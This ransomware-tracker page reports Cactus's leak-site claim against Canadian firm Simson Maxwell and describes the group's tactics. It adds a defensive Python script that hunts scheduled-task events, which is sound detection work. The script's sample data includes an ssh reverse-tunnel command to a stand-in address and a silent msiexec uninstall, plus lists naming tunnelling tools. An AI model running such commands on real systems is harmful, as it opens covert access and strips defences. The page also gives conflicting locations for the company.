Simson Maxwell Hit by Cactus Ransomware Exposing Sensitive Data

Incident Date:

September 3, 2024

Overview

Victim

Simson Maxwell

Attacker

Cactus

Location

Stittsville, Canada

First Reported

September 3, 2024

Simson Maxwell Falls Victim to Cactus Ransomware Attack

Simson Maxwell, a Canadian company specializing in power generation and industrial engine solutions, has been listed on the leak site of the Cactus ransomware group, which claims to have exfiltrated a large volume of sensitive company data. If the claim is accurate, the exposure carries serious operational, legal, and reputational risk for the company and for the customers whose information is involved.

About Simson Maxwell

Established in 1941, Simson Maxwell has built a strong reputation over more than 80 years for delivering power generation and industrial engine products and services. The company operates from its headquarters in Edmonton, Alberta, and serves over 6,000 customers across Canada. With approximately 115 employees, Simson Maxwell is known for its custom power generation solutions under the Simmax® brand, as well as its service and maintenance programs.

Details of the Attack

The Cactus ransomware group has claimed responsibility for the attack on Simson Maxwell via its dark web leak site. According to the group's listing, the stolen data includes business documents such as contracts, project files, and financial records, together with customer information, corporate and personal correspondence, technical drawings and designs, and employee data. Categories like these are worth taking seriously even before the claim is verified: customer and employee records enable follow-on fraud and phishing, and engineering drawings are intellectual property that cannot be recalled once published.

About the Cactus Ransomware Group

First observed in March 2023, the Cactus ransomware group has quickly become a notable player in the ransomware landscape. The group gains initial access by exploiting vulnerabilities in VPN appliances and through phishing. Cactus runs a double-extortion scheme: it encrypts data and also threatens to publish exfiltrated files if the ransom is not paid. The encryptor uses a combination of RSA and AES, and the binary itself is distributed in encrypted form and will only run when the operator supplies a decryption key on the command line, which hinders static analysis and automated sandboxing; the group also disables endpoint security software before deploying it.

Penetration and Impact

Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably Fortinet appliances, and in data analytics platforms such as Qlik Sense. The group also buys stolen credentials on underground forums to facilitate intrusions. Once inside a network, Cactus sets up SSH-based command and control and uses Scheduled Tasks to keep that access across reboots. It scans the network to identify additional targets and typically disables security software before encryption. For defenders, the practical priorities follow directly from this chain: patch and monitor internet-facing VPN and analytics servers, require MFA on remote access, alert on newly created scheduled tasks that launch binaries from user-writable paths, and treat removal or tampering of endpoint protection as an incident in its own right.
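The persistence and tunnelling pattern above is detectable from standard Windows audit logs. As an added detection example (written for this page, not code from the tracker, from Cactus, or from any vendor), the Python below parses the TaskContent XML carried in Windows Security event 4698 (scheduled task created) and flags tasks that launch an SSH-style tunnelling binary, open a reverse tunnel, uninstall a product via msiexec, run a network scanner, or execute from a user-writable directory. The indicator lists, the sample events, the 203.0.113.10 address and the placeholder GUID are all constructed assumptions; msiexec /x is offered as one plausible mechanism for "disabling security software", which the page does not specify.

```python
"""Detection example: flag scheduled tasks that match the Cactus
post-exploitation pattern (SSH tunnel for C2, task-based persistence,
security-software removal). Parses the TaskContent XML carried in
Windows Security event 4698. Sample events are constructed for this
example and are not real telemetry from this incident."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Task Scheduler XML namespace used in TaskContent.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed indicator lists for this example; tune to your environment.
TUNNEL_BINARIES = {"ssh.exe", "plink.exe", "chisel.exe"}
SCANNER_BINARIES = {"nmap.exe", "netscan.exe", "advanced_ip_scanner.exe"}
STAGING_DIRS = ("\\users\\", "\\programdata\\", "\\temp\\")


@dataclass
class Finding:
    task_name: str
    command: str
    arguments: str
    reasons: list


def parse_exec_action(task_xml: str):
    """Return (command, arguments) of the first <Exec> action, or ('', '')."""
    root = ET.fromstring(task_xml)
    exec_node = root.find(".//t:Actions/t:Exec", NS)
    if exec_node is None:
        return "", ""
    cmd = exec_node.findtext("t:Command", default="", namespaces=NS)
    args = exec_node.findtext("t:Arguments", default="", namespaces=NS)
    return cmd.strip(), args.strip()


def score_task(task_name: str, task_xml: str):
    """Return a Finding if the task looks like Cactus tradecraft, else None."""
    cmd, args = parse_exec_action(task_xml)
    base = cmd.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    tokens = args.split()
    reasons = []
    if base in TUNNEL_BINARIES:
        reasons.append(f"tunnelling binary {base}")
        # -R (ssh/plink) or R: (chisel) opens a reverse tunnel back to the operator.
        if "-R" in tokens or any(t.startswith("R:") for t in tokens):
            reasons.append("reverse tunnel (-R)")
    if base == "msiexec.exe" and "/x" in (t.lower() for t in tokens):
        # Product uninstall from a scheduled task: an assumed way to remove
        # security software (the page only says it is disabled).
        reasons.append("product uninstall via msiexec /x")
    if base in SCANNER_BINARIES:
        reasons.append(f"network scanner {base}")
    if any(d in cmd.lower() for d in STAGING_DIRS):
        reasons.append("executable in user-writable path")
    if not reasons:
        return None
    return Finding(task_name, cmd, args, reasons)


def hunt(events):
    """Run score_task over 4698 events (dicts with EventID/TaskName/TaskContent)."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4698:
            continue
        finding = score_task(ev["TaskName"], ev["TaskContent"])
        if finding:
            findings.append(finding)
    return findings


def task_xml(command: str, arguments: str) -> str:
    """Build a minimal TaskContent document (helper for the constructed samples)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Actions Context="Author"><Exec>'
        f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
        "</Exec></Actions></Task>"
    )


# Constructed sample events (not real telemetry). 203.0.113.10 is a
# documentation-range address; the GUID is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": task_xml(r"%windir%\system32\defrag.exe", "-c -h -k -g")},
    {"EventID": 4698, "TaskName": r"\Updater",
     "TaskContent": task_xml(r"C:\ProgramData\ssh\ssh.exe",
                             "-N -R 2222:127.0.0.1:3389 tunnel@203.0.113.10")},
    {"EventID": 4698, "TaskName": r"\Cleanup",
     "TaskContent": task_xml(r"C:\Windows\System32\msiexec.exe",
                             "/x {00000000-0000-0000-0000-000000000000} /qn")},
    # A 4702 (task updated) event is ignored by hunt(); only creations are scored.
    {"EventID": 4702, "TaskName": r"\Updater", "TaskContent": task_xml("x", "y")},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.task_name}: {f.command} {f.arguments} -> {', '.join(f.reasons)}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled in the advanced audit policy, so confirm that it is on (and forwarded to your SIEM) before relying on this logic; in a real deployment, the same scoring would run over the TaskContent field of forwarded events rather than the inline samples.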

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing near real-time tracking of ransomware attacks, groups, and their victims. Given the scale of threat actors' financial success so far, ransomware has become the most widespread cyber threat to businesses and organizations today, and among the most damaging in both financial and data-loss terms.

The site's data is derived from the leak sites operated by real-world threat actors, supplemented by a handful of other trackers. While sanitization efforts have been made, we cannot guarantee the data is 100% accurate. Attack entries will be updated as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge that you do so at your own risk.